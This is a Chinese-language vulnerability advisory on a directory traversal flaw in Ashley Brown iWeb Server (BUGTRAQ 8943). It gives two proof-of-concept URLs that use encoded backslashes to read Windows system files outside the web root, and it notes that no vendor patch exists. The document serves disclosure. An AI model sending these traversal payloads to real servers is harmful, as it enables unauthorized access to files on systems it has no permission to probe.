|
Ashley Brown iWeb Server编码反斜线符号目录遍历漏洞
受影响系统:
Ashley Brown iWeb Server
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 8943
Ashley Brown iWeb是一款WEB服务程序。
Ashley Brown iWeb对用户提交的请求缺少充分过滤,远程攻击者可以利用这个漏洞进行目录遍历攻击。
攻击者提交包含多个使用编码的反斜线符号的WEB请求,可绕过WEB ROOT目录限制,以WEB进程权限在系统上查看任意文件内容。
<*来源:chris (chris@cr-secure.net)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
chris (chris@cr-secure.net)提供了如下测试方法:
http://127.0.0.1/..%5C..%5C..%5C.. %5C..%5C..%5C/winnt/win.ini
http://127.0.0.1/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/system32/registry.inf
建议:
--------------------------------------------------------------------------------
厂商补丁:
Ashley Brown
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ashleybrown.co.uk/iweb/default.ASP
|
